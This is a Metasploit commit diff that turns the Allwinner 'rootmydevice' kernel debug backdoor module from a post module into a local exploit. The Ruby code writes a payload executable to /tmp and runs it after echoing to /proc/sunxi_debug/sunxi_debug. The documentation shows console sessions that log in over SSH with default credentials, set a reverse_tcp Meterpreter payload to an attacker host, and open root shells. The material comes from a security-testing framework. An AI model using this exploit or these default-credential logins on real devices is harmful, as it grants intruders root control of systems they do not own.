Land #7355, allwinner post to local exploit conversion

2016-10-08 21:38:54 -05:00 · 2016-10-08 21:38:54 -05:00 · b77a910205
parent e074669406 cba297644e
commit b77a910205
3 changed files with 106 additions and 110 deletions
--- a/documentation/modules/exploit/multi/local/allwinner_backdoor.md
+++ b/documentation/modules/exploit/multi/local/allwinner_backdoor.md
@ -0,0 +1,71 @@
+  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+  Vulnerable OS: all OS images available for Orange Pis,
+				 any for FriendlyARM's NanoPi M1,
+				 SinoVoip's M2+ and M3,
+				 Cuebietech's Cubietruck +
+				 Linksprite's pcDuino8 Uno
+  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+
+This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
+
+## Usage
+
+To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
+
+- `use auxiliary/scanner/ssh/ssh_login`
+
+```
+msf auxiliary(ssh_login) > set username orangepi
+username => orangepi
+msf auxiliary(ssh_login) > set password orangepi
+password => orangepi
+msf auxiliary(ssh_login) > set rhosts 192.168.2.21
+rhosts => 192.168.2.21
+msf auxiliary(ssh_login) > exploit
+
+[*] 192.168.2.21:22 SSH - Starting bruteforce
+[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
+[!] No active DB -- Credential data will not be saved!
+[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+- `use exploit/multi/local/allwinner_backdoor`
+
+```
+msf exploit(allwinner_backdoor) > set verbose true
+verbose => true
+msf exploit(allwinner_backdoor) > set session 1
+session => 1
+msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
+payload => linux/armle/mettle/reverse_tcp
+msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(allwinner_backdoor) > check
+[*]  The target appears to be vulnerable.
+msf exploit(allwinner_backdoor) > exploit
+```
+
+## Successful exploitation:
+
+```
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (374540 bytes) to 192.168.2.248
+[+] Backdoor Found, writing payload to /tmp/odzVx.elf
+[*] Max line length is 65537
+[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
+[+] Escalating
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (374540 bytes) to 192.168.2.248
+[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 192.168.2.248
+OS           : Ubuntu 14.04 (Linux 3.4.39)
+Architecture : armv7l
+Meterpreter  : armle/linux
+```
--- a/documentation/modules/post/multi/escalate/allwinner_backdoor.md
+++ b/documentation/modules/post/multi/escalate/allwinner_backdoor.md
@ -1,93 +0,0 @@
-  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-  Vulnerable OS: all OS images available for Orange Pis,
-				 any for FriendlyARM's NanoPi M1,
-				 SinoVoip's M2+ and M3,
-				 Cuebietech's Cubietruck +
-				 Linksprite's pcDuino8 Uno
-  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
-
-This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
-
-## Usage
-
-To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
-
- `use auxiliary/scanner/ssh/ssh_login`
-
-```
-msf auxiliary(ssh_login) > set username orangepi
-username => orangepi
-msf auxiliary(ssh_login) > set password orangepi
-password => orangepi
-msf auxiliary(ssh_login) > set rhosts 192.168.2.21
-rhosts => 192.168.2.21
-msf auxiliary(ssh_login) > exploit
-
-[*] 192.168.2.21:22 SSH - Starting bruteforce
-[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
-
- `use post/multi/escalate/allwinner_backdoor`
-
-```
-msf post(allwinner_backdoor) > set verbose true
-verbose => true
-msf post(allwinner_backdoor) > set session 1
-session => 1
-msf post(allwinner_backdoor) > run
-```
-
-## Successful exploitation:
-
-```
-[+] Backdoor found, exploiting.
-[+] Privilege Escalation Successful
-[*] Post module execution completed
-msf post(allwinner_backdoor) > sessions -i 1
-[*] Starting interaction with 1...
-
-2013564244
-uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
-true
-RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
-TitlDmvnSvINczARsMAKdajpRoXEohXO
-0
-RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
-id
-uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
-^Z
-Background session 1? [y/N]  y
-```
-
-## Graceful exit on non-vulnerable devices:
-
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username pi
-username => pi
-msf auxiliary(ssh_login) > set password raspberry
-password => raspberry
-msf auxiliary(ssh_login) > set rhosts basementpi
-rhosts => basementpi
-msf auxiliary(ssh_login) > exploit
-
-[*] 192.168.2.80:22 SSH - Starting bruteforce
-[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
-msf post(allwinner_backdoor) > set verbose true
-verbose => true
-msf post(allwinner_backdoor) > set session 1
-session => 1
-msf post(allwinner_backdoor) > run
-
-[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
-[*] Post module execution completed
-```
--- a/modules/exploits/multi/local/allwinner_backdoor.rb
+++ b/modules/exploits/multi/local/allwinner_backdoor.rb
@ -5,9 +5,12 @@

 require "msf/core"

-class MetasploitModule < Msf::Post
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
  include Msf::Post::File
  include Msf::Post::Linux::Priv
+  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
@ -31,6 +34,11 @@ class MetasploitModule < Msf::Post
          ],
        "Platform"       => [ "android", "linux" ],
        "DisclosureDate" => "Apr 30 2016",
+        "DefaultOptions" => {
+          "payload" => "linux/armle/mettle/reverse_tcp"
+        },
+        "Privileged"     => true,
+        "Arch"           => ARCH_ARMLE,
        "References"     =>
          [
            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
@ -38,26 +46,36 @@ class MetasploitModule < Msf::Post
                     "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
          ],
-        "SessionTypes"   => [ "shell", "meterpreter" ]
+        "SessionTypes"   => [ "shell", "meterpreter" ],
+        'Targets'        =>
+          [
+            [ 'Auto',           { } ]
+          ],
+        'DefaultTarget'  => 0,
      ))
  end

-  def run
-    backdoor = "/proc/sunxi_debug/sunxi_debug"
+  def check
+    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
-      vprint_good "Backdoor found, exploiting."
-      cmd_exec("echo rootmydevice > #{backdoor}")
-      if is_root?
-        print_good "Privilege Escalation Successful"
-        report_vuln(
-          host: session.session_host,
-          name: self.name,
-          refs: self.references,
-          info: 'Escalated to root shell via Allwinner backdoor'
-        )
-      else
-        print_error "Privilege Escalation FAILED"
-      end
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    backdoor = '/proc/sunxi_debug/sunxi_debug'
+    if file_exist?(backdoor)
+      pl = generate_payload_exe
+
+      exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
+      vprint_good "Backdoor Found, writing payload to #{exe_file}"
+      write_file(exe_file, pl)
+      cmd_exec("chmod +x #{exe_file}")
+
+      vprint_good 'Escalating'
+      cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
    else
      print_error "Backdoor #{backdoor} not found."
    end